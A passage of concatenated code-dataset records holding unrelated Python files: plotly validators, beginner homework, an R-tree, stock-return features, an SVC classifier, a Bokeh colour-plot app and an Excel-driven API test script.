'os'],\n\t\t\ttrimOwner=False)\n\n","sub_path":"common/src/stack/command/stack/commands/list/box/pallet/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599097981","text":"import _plotly_utils.basevalidators\n\n\nclass BarsValidator(_plotly_utils.basevalidators.CompoundArrayValidator):\n\n def __init__(\n self, plotly_name='bar', parent_name='layout.template.data', **kwargs\n ):\n super(BarsValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop('data_class_str', 'Bar'),\n data_docs=kwargs.pop('data_docs', \"\"\"\n\"\"\"),\n **kwargs\n )\n","sub_path":"tempenv/lib/python3.7/site-packages/plotly/validators/layout/template/data/_bar.py","file_name":"_bar.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"206666361","text":"#-------------------------------------------------1\n\nprint('Please input (y)es for accept othervise no')\n\n\n\nitem_banana = input('Have you banana in refrigerator ? ') == 'y'\nitem_sour_cream = input(\"Have you sour cream in refrigerator ? \") =='y'\nitem_tomatoes = input('Have you tomatoes in refrigerator ? ') == 'y'\nitem_egg = input('Have you egg in refrigerator ? ') == 'y'\nitem_sausage = input('Have you sausage in refrigerator ? ') == 'y'\n\nhome_electricity = input('Have at home electricity ? ') == 'y'\n\nremove_banana = item_banana and not home_electricity\nremove_sour_cream = item_sour_cream and not home_electricity\nremove_tomatoes = item_tomatoes and not home_electricity\nremove_egg = item_egg and not home_electricity\nremove_sausage = item_sausage and not home_electricity\n\nprint('remove banana: ' + str(remove_banana))\nprint('remove_sour_cream: ' + str(remove_sour_cream))\nprint('remove_tomatoes: ' + str(remove_tomatoes))\nprint('remove_egg: ' + str(remove_egg))\nprint('remove_sausage: ' + str(remove_sausage))\n\nprint(\"Go bring banana: \" + str(not item_banana))\nprint('Go bring sour cream: ' + str(not item_sour_cream))\nprint('Go bring tomatoes: ' + str(not item_tomatoes))\nprint('Go bring egg :' + str(not item_egg))\nprint('Go bring sausage: ' + str(not item_sausage))\n\n#---------------------------------------------------- 2\n\nphone_color = \"red\"\nphone_model = \"iphone\"\nphone_version = str(7)\n\n\ncolor = input(\"tell your phone color?\")\nmodel = input(\"tell your phone model?\")\nversion = input(\"tell your phone version?\")\n\nprint(phone_color == color and phone_model ==model and phone_version == version) \nprint(phone_color == color or phone_model ==model or phone_version == version)\nprint(phone_color == color , phone_model ==model , phone_version == version)\n\n\n#--------------------------------------------------------3\n\n# Calculator , (if , elif , else:):\nwhile True:\n\twhat = input(\"what do ? (+ , - , / , *):\")\n\t\n\tif what in (\"+\", '-', '/', '*' ):\n\t\tbreak\n\telse:\n\t\tprint(\"Please Select one of these operators:\")\n\n\na = float(input(\"Enter first number: \"))\nb = float(input(\"Enter second number: \"))\n\nif what == '+':\n\tc = a + b\n\tprint('Result is ' + str(c))\nelif what == '-':\n\tc = a - b\n\tprint('Result is ' + str(c))\nelif what == '*':\n\tc = a * b\n\tprint('Result is ' + str(c))\nelif what == '/':\n\tc = a / b\n\tprint('Result is ' + str(c))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Homework3.py","file_name":"Homework3.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204441892","text":"import os\nimport shutil\n\nclass FileSystem:\n\t@staticmethod\n\tdef create_dir( parent_dir, dir_name):\n\t\tfull_path = os.path.join(parent_dir, dir_name)\n\t\tif not os.path.isdir(full_path):\n\t\t\tos.path.mkdirs(full_path)\n\t\treturn full_path\n\t\t\t\n\t@staticmethod\n\tdef create_test_dir( tests_dir, report_sub_dir, report_name, report_test_name):\n\t\tfull_path = os.path.join(tests_dir, report_sub_dir, report_name, report_test_name)\n\t\tif not os.path.isdir(full_path):\n\t\t\tos.makedirs(full_path)\n\t\t\tFileSystem.create_file( os.path.join(tests_dir, report_sub_dir), \"__init__.py\")\t\t\t\n\t\t\tFileSystem.create_file( os.path.join(tests_dir, report_sub_dir,report_name), \"__init__.py\")\n\t\t\tFileSystem.create_file( os.path.join(tests_dir, report_sub_dir,report_name, report_test_name), \"__init__.py\")\t\t\n\t\treturn full_path\n\t\t\n\t@staticmethod\n\tdef create_dir( dir_path ):\n\t\tif not os.path.isdir(dir_path):\n\t\t\tos.makedirs(dir_path)\t\t\t\n\t\treturn dir_path\t\t\n\t\t\n\t@staticmethod\n\tdef create_file( parent_dir, file_name):\n\t\tfull_path = os.path.join( parent_dir, file_name)\n\t\tif not os.path.isfile(full_path):\n\t\t\tf = open(full_path,\"w\")\t\t\n\t\t\tf.close()\n\t\treturn full_path\t\t\n\t\t\n\t@staticmethod\n\tdef create_and_open_file( parent_dir, file_name, mode=\"w\"):\n\t\tfull_path = os.path.join( parent_dir, file_name)\n\t\tif not os.path.isfile(full_path):\n\t\t\t# print \"hohoho\", full_path\n\t\t\tfile_handle = open(full_path,mode)\n\t\telse:\n\t\t\tfile_handle = open(full_path,mode)\n\t\t\t# file_handle.write(\"=\"*50)\n\t\t\t# file_handle.write(\"\\n%sAPPENDING%s\\n\" % (\" \" * 10, \" \" * 10))\n\t\t\t# file_handle.write(\"=\"*50)\n\t\treturn file_handle\t","sub_path":"Reports/Automation/mssql/rtaf/lib/util/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137363088","text":"from Node import Node\nfrom Object import Rect,Point\nfrom graphviz import Digraph\nimport math\n\nclass RTree:\n def __init__(self, B=4):\n self.B = B\n self.root = Node(self.B) \n\n def insert(self,point,node=None):\n if(node is None):\n node = self.root\n\n if(node.is_leaf()):\n node.insert_point(point)\n #node.updateMBR()\n if (node.is_overflow()):\n self.handle_overflow(node)\n\n else:\n node_v=self.choose_subtree(node,point)\n self.insert(point,node_v)\n\n def handle_overflow(self,node):\n #split\n node,new_node = self.split_leaf_node(node) if node.is_leaf() else self.split_internal_node(node)\n\n if (node is self.root) :\n self.root = Node(self.B)\n self.root.insert_child_node(node)\n self.root.insert_child_node(new_node)\n self.root.updateMBR()\n else:\n \n w_node=node.get_parent()\n node.updateMBR()\n w_node.insert_child_node(new_node)\n #w_node.updateMBR()\n if(w_node.is_overflow()):\n self.handle_overflow(w_node)\n\n\n def choose_subtree(self,node,point):\n best_child=None\n best_perimeter = 0\n\n for item in node.child_nodes:\n if( node.child_nodes.index(item) == 0 or \\\n best_perimeter > item.perimeter_increase_with_point(point)):\n best_child=item\n best_perimeter=item.perimeter_increase_with_point(point)\n return best_child\n\n def split_leaf_node(self,node):\n m = len(node.points)\n best_perimeter = -1\n best_set1 = []\n best_set2 = []\n pointsortx=sorted(node.points, key=lambda point: point.x)\n for i in range(int(0.4*m),int(0.6*m)+1):\n S1=pointsortx[:i]\n S2=pointsortx[i:]\n tempP = node.get_pointsMBR_perimeter(S1)\\\n +node.get_pointsMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n\n pointsorty=sorted(node.points, key=lambda point: point.y)\n \n for i in range(int(0.4*m),int(0.6*m)+1):\n S1=pointsorty[:i]\n S2=pointsorty[i:]\n tempP=node.get_pointsMBR_perimeter(S1)\\\n +node.get_pointsMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n \n node.points=best_set1\n node.updateMBR()\n new_node=Node(self.B)\n for pointt in best_set2:\n new_node.insert_point(pointt)\n new_node.updateMBR()\n return node,new_node\n \n def split_internal_node(self,node):\n m = len(node.child_nodes)\n best_perimeter = -1\n best_set1 = []\n best_set2 = []\n pointsortx1=sorted(node.child_nodes, key=lambda child: child.MBR.x1)\n for i in range(int(0.4*m),int(0.6*m)+1):\n \n S1=pointsortx1[:i]\n S2=pointsortx1[i:]\n tempP = node.get_nodesMBR_perimeter(S1)\\\n +node.get_nodesMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n \n pointsortx2=sorted(node.child_nodes, key=lambda child: child.MBR.x2)\n for i in range(int(0.4*m),int(0.6*m)+1):\n \n S1=pointsortx2[:i]\n S2=pointsortx2[i:]\n tempP = node.get_nodesMBR_perimeter(S1)\\\n +node.get_nodesMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n\n pointsorty1=sorted(node.child_nodes, key=lambda child: child.MBR.y1)\n for i in range(int(0.4*m),int(0.6*m)+1):\n S1=pointsorty1[:i]\n S2=pointsorty1[i:]\n tempP=node.get_nodesMBR_perimeter(S1)\\\n +node.get_nodesMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n pointsorty2=sorted(node.child_nodes, key=lambda child: child.MBR.y2)\n \n for i in range(int(0.4*m),int(0.6*m)+1):\n S1=pointsorty2[:i]\n S2=pointsorty2[i:]\n tempP=node.get_nodesMBR_perimeter(S1)\\\n +node.get_nodesMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n \n node.child_nodes =best_set1\n node.updateMBR()\n new_node=Node(self.B)\n for pointt in best_set2:\n new_node.insert_child_node(pointt)\n new_node.updateMBR()\n return node,new_node\n\n def range_query(self,region,node=None):\n if node is None:\n node=self.root\n\n if(node.is_leaf()):\n points=[]\n for point in node.points:\n if(region.is_covered(point)):\n points.append(point)\n return points\n\n else:\n points=[]\n for child in node.child_nodes:\n if( region.intersect(child.MBR)):\n points+=range_query(region,child)\n\n return points\n\n def show(self):\n dot=Digraph()\n self.root.show(dot)\n #print(dot.source)\n dot.render('R-tree.gv',view=True)\n \n \n","sub_path":"R-tree/R-tree/R_tree.py","file_name":"R_tree.py","file_ext":"py","file_size_in_byte":5750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262225392","text":"from PIL import Image\nimport numpy as np\nimport random\nfrom skimage.transform import resize\n\ndef load_image(image_file, img_format=\"LA\"):\n im = Image.open(image_file)\n im = im.convert(img_format)\n return np.array(im)\n\n\ndef textmap(x, y, p):\n data = []\n for j in range(y):\n row = []\n for i in range(x):\n if p[0] <= i and i<= p[2] and p[1] <= j and j <= p[3]:\n e = 255\n else:\n e = 0\n row.append(e)\n data.append(row)\n return np.array(data)\n\n\ndef formatting(arr, tmap, size=(150, 150), img_format=\"LA\"):\n arr[:,:,-1] = tmap\n out = resize(arr, size)\n return out \n\n\ndef processing(img_file, ps, size=(1280,1280), img_format=\"LA\"):\n results = []\n img = load_image(img_file, img_format=img_format)\n for p in ps:\n tmap = textmap(img.shape[1], img.shape[0], p)\n results.append(formatting(img, tmap, size, img_format))\n return results\n","sub_path":"model2/bindetector.py","file_name":"bindetector.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"451460109","text":"import os\nimport csv\n\npath = os.path.join('..', 'Resources', 'netflix_ratings.csv')\n\nsearch_title = input(\"Enter a movie title: \")\n\nwith open(path, 'r') as file:\n \n dict_reader = csv.DictReader(file)\n \n for row in dict_reader:\n print(row)\n break","sub_path":"Misc_Practice/csv_netflix_practice.py","file_name":"csv_netflix_practice.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340260101","text":"#\n# Copyright (c) 2018-2019 Intel Corporation\n#\n# This work is licensed under the terms of the MIT license.\n# For a copy, see .\n#\n\n\"\"\"\nTool Function used to implement SVC algorithm\n\"\"\"\n\n# ------------------------\n# IMPORTS\n# ------------------------\n\nimport numpy\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom evaluate_model import evaluate\nfrom test_model import test\nfrom train_model import svc_train\nfrom tunning_hyperparameters import svc_tunning\n\n# --------------------------------------\n# Main Function for SCV Implementation\n# --------------------------------------\n\nif __name__ == '__main__':\n\n # Load Dataset\n dataset = numpy.loadtxt(\"../csv/dataset.csv\", delimiter=\";\", skiprows=1)\n\n # Parse Data from Dataset into 3 Categories\n y = dataset[:, 11]\n classifications = 3\n new_y = []\n for sample in y:\n if 0 <= sample <= 4:\n # 0, 1, 2, 3, 4\n new_y.append(0)\n elif 5 <= sample <= 6:\n # 5, 6\n new_y.append(1)\n else:\n # 7, 8, 9, 10\n new_y.append(2)\n y = new_y\n X = dataset[:, 0:11]\n\n # Divide Dataset: 20% Test and 80% Train\n x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=5)\n\n # Now we're going to Tunning Hyperparameters only with Train Data\n best_parameters = svc_tunning(x_train, y_train)\n # best_parameters = {'C': 10, 'gamma': 0.001, 'kernel': 'rbf'}\n # best_parameters = {'C': 10, 'gamma': 0.9 , 'kernel': 'rbf'}\n\n # Pass the best parameters to train, and the Train Data\n trained_model = svc_train(x_train, y_train, c=best_parameters[\"C\"], gamma=best_parameters[\"gamma\"],\n kernel=best_parameters[\"kernel\"])\n\n # Evaluate the model\n print(\"Evaluate model\\n\")\n evaluate(trained_model, x_train, y_train)\n\n # Test the model\n print(\"Train model\\n\")\n test(trained_model, x_test, y_test)\n","sub_path":"first_project/svc/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"615394127","text":"import pandas as pd\nimport numpy as np\nimport os\n\ndef insert_returns(sd):\n # this is the return to close of the day or month\n # e.g. daily_r on dd/mm/yyyy is the return from dd/mm/yyyy - 1d to dd/mm/yyyy\n # e.g. monthly_r on dd/mm/yyyy is the return from dd/mm/yyyy - 1m to dd/mm/yyyy\n sd.sort_values(['symbol', 'date'], inplace = True)\n sd['daily_r'] = sd.groupby('symbol')['close'].apply(lambda x: np.log(x) - np.log(x.shift(1)))\n sd['monthly_r'] = sd.groupby(['symbol', 'year', 'month'])['daily_r'].transform(sum)\n return(sd)\n\n# last M months returns skip latest\ndef m_returns_skip_1(r, M = 12):\n M -= 1 # python is zero based\n out = 0\n for m in range(M):\n out += r.shift(m+1)\n return(out) \n\ndef insert_signal_returns(sd):\n\n monthly_r_skip_1 = sd.groupby(['symbol', 'year', 'month']\n )['monthly_r'].last().to_frame('monthly_r_skip_1').apply(m_returns_skip_1)\n\n if 'monthly_r_skip_1' in sd:\n sd.drop(\"monthly_r_skip_1\", inplace = True, axis = 1)\n \n sd = pd.merge(left = sd,\n left_on = ['symbol', 'year', 'month'],\n right = monthly_r_skip_1,\n right_index = True,\n how = 'left')\n\n return(sd)\n\ndef append_data_frame(old, new):\n if(old.empty):\n old = new\n else:\n old = pd.concat([old, new])\n return(old) \n\ndef read_market_constituents(file_dir = ''):\n\n all_data = pd.DataFrame()\n years = np.arange(2017, 2020 + 1, 1)\n months = np.arange(1, 12 + 1, 1)\n\n for y in years:\n for m in months:\n if m < 10:\n date_str = str(y) + '0' + str(m) + '01'\n else:\n date_str = str(y) + str(m) + '01'\n file_str = date_str + '-all-ords.csv'\n file_str = os.path.join(file_dir, file_str)\n try:\n new_data = pd.read_csv(file_str, header=1).iloc[:,:5]\n new_data['file_date'] = date_str\n all_data = append_data_frame(all_data, new_data)\n except:\n print('read failed {}'.format(file_str))\n\n return(all_data)\n\ndef rank_market_constituents(mcd): \n mcd['MarketCap'] = pd.to_numeric(mcd['Market Cap'].str.replace(',', ''))\n mcd['MarketCapRank'] = mcd.groupby('file_date')['MarketCap'].rank()\n mcd['MarketCapInvRank'] = - mcd.MarketCap\n mcd['MarketCapInvRank'] = mcd.groupby('file_date')['MarketCapInvRank'].rank()\n mcd['MarketCapPctRank'] = mcd.groupby('file_date')['MarketCap'].rank(pct = True)\n return(mcd)","sub_path":"feature_engineering/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"207327823","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 8 12:03:40 2019\r\n\r\n@author: Rosa\r\n\"\"\"\r\nfrom file_reader import file_reader\r\n#par\r\n\r\ndef par(arr):\r\n i = len(arr)-1\r\n p = arr[0]\r\n for j in range(len(arr)-1, 0, -1):\r\n if arr[j] > p:\r\n arr[j], arr[i] = arr[i],arr[j]\r\n i -= 1\r\n arr[i], arr[0] = arr[0],arr[i]\r\n i -=1\r\n for j in range(i, -1, -1):\r\n if arr[j] == p:\r\n arr[j], arr[i] = arr[i], arr[j]\r\n i -= 1\r\n return arr\r\n\r\nif __name__ == \"__main__\":\r\n input_list = file_reader(\"rosalind_par (1).txt\")\r\n sa = [4,5,6,4,1,2,5,7,4]\r\n array = list(map(int, input_list[1].split()))\r\n par(array)\r\n par(sa)\r\n print(sa)\r\n answer = \" \".join(list(map(str, array)))\r\n print(answer)\r\n with open(\"./answer.txt\", \"w\") as file:\r\n file.write(answer)","sub_path":"par.py","file_name":"par.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193286723","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 23 15:59:38 2020\n\n@author: tang\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport operator\n#from sklearn.cluster import KMeans\nfrom scipy.interpolate import interp1d\n\nfrom bokeh.models import ColumnDataSource, Select, RangeSlider, Slider\nfrom bokeh.layouts import row, column\nfrom bokeh.plotting import figure\nfrom bokeh.models import HoverTool,Range1d\nfrom bokeh.io import output_file, show, curdoc\n\nplt.rcParams['savefig.dpi'] = 200 \nplt.rcParams['figure.dpi'] = 100 \n\ndata_path = '/Users/Dartoon/Downloads/shenli_data'\nos.chdir(data_path)\nsample = pd.read_csv('five_band_color.csv', index_col = 0)\nsample['status'] = 'wait' # actually some has been observe, but not updated for the latest list yet\nsample['telescope'] = 'wait' \nstellar = pd.read_csv('stellar.csv')\nprint(stellar)\n#%%\nstellar_color = np.array(stellar[['g-r','r-i']])\ndef distance(x,y):\n values = np.sqrt((x-stellar_color[:,0])**2+(y-stellar_color[:,1])**2)\n return min(enumerate(values), key=operator.itemgetter(1))\nsample['qso_dis'] = sample.apply(lambda x: distance(x['qso_g-r'], x['qso_r-i'])[1], axis=1)\nsample['com_dis'] = sample.apply(lambda x: distance(x['com_g-r'], x['com_r-i'])[1], axis=1)\nsample['pos_qso_dis'] = sample.apply(lambda x: distance(x['qso_g-r'], x['qso_r-i'])[0], axis=1)\nsample['pos_com_dis'] = sample.apply(lambda x: distance(x['com_g-r'], x['com_r-i'])[0], axis=1)\n\n#%%\n# Convert dataframe to column data source\nqso_com = ColumnDataSource(data={\n 'No' : sample.index,\n 'z' : sample['Redshift'],\n 'qso_y' : sample['qso_r-i'],\n 'qso_x' : sample['qso_g-r'],\n 'com_y' : sample['com_r-i'],\n 'com_x' : sample['com_g-r'],\n 'qso_dis' : sample['qso_dis'],\n 'com_dis' : sample['com_dis'],\n 'Sep' : sample['Sep(\")'],\n 'ID' : sample['ID'],\n 'imgs' : sample['img'],\n 'status' : sample['status']\n})\n#QSO = []\n#done = []\n#wait = []\n#for index,item in enumerate(qso_com.data['status']):\n# if item == 'QSO':\n# QSO.append(index)\n# elif item == 'done':\n# done.append(index)\n# else:\n# wait.append(index)\n#print(qso_com.data.index)\n#print(qso_com.data[][QSO])\n#%%\nhover = HoverTool(\n tooltips=\"\"\"\n
\n
\n \n
\n
\n @ID\n
\n
\n [@No]\n
\n
\n \"\"\"\n )\n\nTOOLS = 'pan,box_zoom,box_select,lasso_select,reset'\n \n# Create the figure: p\np1 = figure(y_axis_label='qso_r-i', x_axis_label='qso_g-r',tools=TOOLS)\n#qso vs stellar locus\np1.circle('qso_x', 'qso_y', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'red')\np1.line(stellar['g-r'], stellar['r-i'], color = 'black', line_width = 1)\n#p1.line((stellar['g-r'].iloc[sample['pos_qso_dis']], stellar['r-i'].iloc[sample['pos_qso_dis']]),('qso_x', 'qso_y'),source=qso_com,color = 'red',line_width = 1, alpha = 0, hover_fill_alpha = 1)\n\np2 = figure(y_axis_label='com_r-i', x_axis_label='com_g-r',tools=TOOLS)\np2.circle('com_x', 'com_y', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'blue')\np2.line(stellar['g-r'], stellar['r-i'], color = 'black', line_width = 1)\n\np3 = figure(y_axis_label='qso_dis', x_axis_label='qso_g-r',tools=TOOLS)\np3.circle('qso_x', 'qso_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'red')\n\np4 = figure(y_axis_label='com_dis', x_axis_label='com_g-r',tools=TOOLS)\np4.circle('com_x', 'com_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'blue')\n\np5 = figure(y_axis_label='qso_dis', x_axis_label='qso_r-i',tools=TOOLS)\np5.circle('qso_y', 'qso_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'red')\n\np6 = figure(y_axis_label='com_dis', x_axis_label='com_r-i',tools=TOOLS)\np6.circle('com_y', 'com_dis', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'blue')\n\np2.x_range = p1.x_range = p4.x_range = p3.x_range = Range1d(-1,3)\np6.x_range = p5.x_range = Range1d(-1,3)\np2.y_range = p1.y_range = Range1d(-0.6,3)\np4.y_range = p3.y_range = Range1d(-0.2,2)\np6.y_range = p5.y_range = Range1d(-0.2,2)\n\nplots = column(row(p1, p2),row(p3, p4),row(p5, p6))\n\np1.add_tools(hover)\np2.add_tools(hover)\np3.add_tools(hover)\np4.add_tools(hover)\np5.add_tools(hover)\np6.add_tools(hover)\n\nrange_slider = RangeSlider(start=0, end=24, value=(0,24), step=1, title='RA')\nrange_slider2 = RangeSlider(start=0, end=5, value=(0,5), step=0.1, title='Redshift')\nrange_slider3 = RangeSlider(start=0, end=4.2, value=(0,4.2), step=0.1, title='Sep(\")')\n\n# Create a dropdown Select widget: select\n#options1 = ['total','close','medium','medium2','far']\n#select1 = Select(title='Sep', options=options1, value='total')\n\noptions2 = ['all','wait','QSO','done','unclassified']\nselect2 = Select(title='status', options=options2, value='all')\n\n# Define a callback function: update_plot\ndef update_plot(attr, old, new):\n # Read the current value of the slider: scale\n time_zone = range_slider.value\n redshift = range_slider2.value\n Sep = range_slider3.value\n status = select2.value\n # Update source with the new data values\n RA_con = (sample['RA'] >= time_zone[0]*15) & (sample['RA'] <= time_zone[1]*15)\n z_con = (sample['Redshift'] >= redshift[0]) & (sample['Redshift'] <= redshift[1])\n Sep_con = (sample['Sep(\")'] >= Sep[0]) & (sample['Sep(\")'] <= Sep[1])\n if status == 'all':\n sta_con = 1\n else:\n sta_con = (sample['status'] == status)\n com_con = RA_con & z_con & Sep_con & sta_con\n qso_com.data = {\n 'No' : sample.loc[com_con].index,\n 'z' : sample['Redshift'],\n 'qso_y' : sample.loc[com_con, 'qso_r-i'],\n 'qso_x' : sample.loc[com_con, 'qso_g-r'],\n 'com_y' : sample.loc[com_con, 'com_r-i'],\n 'com_x' : sample.loc[com_con, 'com_g-r'],\n 'qso_dis' : sample.loc[com_con, 'qso_dis'],\n 'com_dis' : sample.loc[com_con, 'com_dis'],\n 'Sep' : sample.loc[com_con, 'Sep(\")'],\n 'ID' : sample.loc[com_con, 'ID'],\n 'imgs' : sample.loc[com_con, 'img'],\n 'status' : sample.loc[com_con, 'status']\n }\n\nslider = Slider(start=10, end=50, value=10, step=1, title=\"bins\")\nqso_arr_hist, qso_edges = np.histogram(sample['qso_dis'], \n bins = 10, \n range = [0, 1.6])\ncom_arr_hist, com_edges = np.histogram(sample['com_dis'], \n bins = 10, \n range = [0, 1.6])\ndis_hist_source = ColumnDataSource(data={\n 'qso_num' : qso_arr_hist,\n 'qso_left': qso_edges[:-1], \n 'qso_right': qso_edges[1:],\n 'com_num' : com_arr_hist,\n 'com_left': com_edges[:-1], \n 'com_right': com_edges[1:]})\ndef update_hist(attr, old, new):\n bins = slider.value\n qso_arr_hist, qso_edges = np.histogram(sample['qso_dis'], \n bins = bins, \n range = [0, 1.6])\n com_arr_hist, com_edges = np.histogram(sample['com_dis'], \n bins = bins, \n range = [0, 1.6])\n dis_hist_source.data = {\n 'qso_num' : qso_arr_hist,\n 'qso_left': qso_edges[:-1], \n 'qso_right': qso_edges[1:],\n 'com_num' : com_arr_hist,\n 'com_left': com_edges[:-1], \n 'com_right': com_edges[1:]\n }\n\np7 = figure(x_axis_label = 'qso_distance', y_axis_label = 'Numbers')\np7.quad(bottom=0, top='qso_num',left='qso_left', right='qso_right', source=dis_hist_source, fill_color='red', line_color='black') \np8 = figure(x_axis_label = 'com_distance', y_axis_label = 'Numbers')\np8.quad(bottom=0, top='com_num',left='com_left', right='com_right', source=dis_hist_source, fill_color='blue', line_color='black') \n\n# Attach the update_plot callback to the 'value' property of select\n#select1.on_change('value', update_plot)\nselect2.on_change('value', update_plot)\nrange_slider.on_change('value', update_plot)\nrange_slider2.on_change('value', update_plot)\nrange_slider3.on_change('value', update_plot)\nslider.on_change('value', update_hist)\n\n# Create layout and add to current document\nlayout = column(range_slider,range_slider2,range_slider3, select2, plots,slider,row(p7,p8))\n#show(layout)\ncurdoc().clear()\ncurdoc().add_root(layout)\nshow(p1)\n#cd \"path_to_the_script\"\n#bokeh serve --show bokeh_color.py\n\n\n\n","sub_path":"projects/2021_dual_AGN/Shenli_data/bokeh_color.py","file_name":"bokeh_color.py","file_ext":"py","file_size_in_byte":8964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516721226","text":"# -*- coding: utf-8 -*-\n# @Author : YaMeng\n# @File : lesson_7.py\n# @Software : PyCharm\n# @Time : 2021/3/4 9:34\n# @company : 湖南省零檬信息技术有限公司\n\n\n'''\n1、编写接口自动化的测试用例,读取excel里的测试数据 -- read_data()\n2、发送接口请求,得到响应结果 -- api_func()\n3、预期结果 vs 实际结果 -- done\n4、写入最终的结果到excel -- write_result()\n'''\n\nimport requests\nimport openpyxl\n# 读取数据\ndef read_data(filename, sheetname):\n wb = openpyxl.load_workbook(filename) # 加载工作簿\n sheet = wb[sheetname] # 获取sheet表单\n max_row = sheet.max_row # 获得excel最大的行数\n cases_list = [] # 定义一个空的列表用来存放测试用例\n for i in range(2, max_row+1): # +1 是因为取头不取尾\n dict_1 = dict(\n case_id = sheet.cell(row=i, column=1).value, # 用例编号\n url = sheet.cell(row=i, column=5).value, # 接口地址\n data = sheet.cell(row=i, column=6).value, # 请求参数\n excepted = sheet.cell(row=i, column=7).value) # 预期结果\n cases_list.append(dict_1) # 把字典一条一条的追加到列表里存储\n # print(cases_list)\n return cases_list\n\n# 发送请求\ndef api_func(url, data):\n header = {\"X-Lemonban-Media-Type\":\"lemonban.v2\",\"Content-Type\":\"application/json\"}\n res = requests.post(url=url,json=data,headers=header)\n res_r = res.json()\n return res_r\n\n# 写入结果\ndef write_result(filename, sheetname, row, column, final_res):\n wb = openpyxl.load_workbook(filename) # 加载工作簿\n sheet = wb[sheetname] # 获取sheet表单\n sheet.cell(row=row, column=column).value = final_res # 写入结果\n wb.save(filename) # 保存测试用例\n\n# 执行自动化脚本\ndef execute_func(filename, sheetname):\n cases = read_data(filename, sheetname) # 调用读取函数\n for case in cases: # 从读取函数里返回的数据进行取值\n case_id = case['case_id'] # 取出用例编号\n url = case.get('url') # 取出接口地址\n data = case.get('data') # 取出请求参数\n excepted = case.get('excepted') # 取出预期结果\n data = eval(data) # 使用eval()函数进行类型转换 -->运行被字符串包裹的python表达式\n excepted = eval(excepted) # 类型转换\n excepted_msg = excepted.get('msg') # 取出预期结果里的msg去做结果判断\n real_res = api_func(url=url, data=data) # 调用发送请求的接口\n real_res_msg = real_res.get('msg') # 取出实际结果里的msg去做结果判断\n print('实际结果为:{}'.format(real_res_msg))\n print('预期结果为:{}'.format(excepted_msg))\n if excepted_msg == real_res_msg:\n print('这条测试用例通过!!')\n final_res = 'pass' # 用变量来接收最终结���\n else:\n print('这条测试用例不通过!!!')\n final_res = 'NG' # 用变量来接收最终结果\n print('*' * 40)\n write_result(filename, sheetname, case_id+1, 8, final_res) #调用回写函数\n\nexecute_func('test_case_api.xlsx', 'register')\nexecute_func('test_case_api.xlsx', 'login')\n\n\n\n\n","sub_path":"lesson_7.py","file_name":"lesson_7.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"358325779","text":"class Solution(object):\n\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n S = set(s)\n if len(s) == len(S):\n return len(s)\n\n max_len = 0\n\n for i in range(len(s)):\n temp_s = s[i]\n for j in range(i + 1, len(s)):\n if temp_s.find(s[j]) == 